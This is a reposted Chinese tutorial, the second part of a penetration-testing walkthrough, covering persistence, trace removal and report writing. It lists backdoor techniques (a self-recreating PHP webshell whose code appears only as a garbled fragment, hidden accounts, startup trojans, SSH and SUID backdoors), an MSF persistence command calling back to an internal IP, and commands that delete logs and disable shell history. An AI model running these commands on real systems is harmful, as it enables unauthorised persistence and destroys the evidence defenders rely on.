一次完整的渗透测试流程是这样的(下)

2、权限维持
在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。

1)Web后门
1:隐藏后门文件(将文件设置为隐藏)
2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。

"3"); $b=array_keys($a)[0]; eval($b);?>');
    sleep(5);
}

?>

3:404页面隐藏后门,或者在其他自带文件中插入后门代码
(注:以上几种后门方法均能被D盾等工具检测到)

2)Windows系统
1:建立隐藏用户,在用户名后加 $
2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控
3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现#反弹时间间隔是5s会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀:
run persistence -X -i 5 -p 8888 -r 192.168.10.27#
然后它就在目标机新建了这个文件:
C:\Windows\TEMP\CJzhFlNOWa.vbs
并把该服务加入了注册表中,只要开机就会启动。

4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。
5:shift后门
6:远程桌面会话劫持

3)Linux系统
1:SSH后门
2:crontab定时任务
3:SSH公钥
4:创建SUID=0的用户

4)痕迹清除
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。
最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。

5)Windows系统
1:如果是windows系统,可用MSF中的 clearev 命令清除痕迹
2:如果3389远程登录过,需要清除mstsc痕迹
3:执行命令清除日志:
del %WINDR%* .log /a/s/q/f
4:如果是web应用,找到web日志文件,删除

6)Linux系统
1:如果是Linux系统,在获取权限后,执行以下命令,不会记录输入过的命令
export HISTFILE=/dev/null export HISTSIZE=0
2:删除 /var/log 目录下的日志文件
3:如果是web应用,找到web日志文件,删除

3、撰写渗透测试保告
在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!

文章来源:网络 版权归原作者所有
上文内容不用于商业目的,如涉及知识产权问题,请权利人联系小编,我们将立即处理

你可能感兴趣的:(软件测试,IT,程序员,软件测试,渗透测试)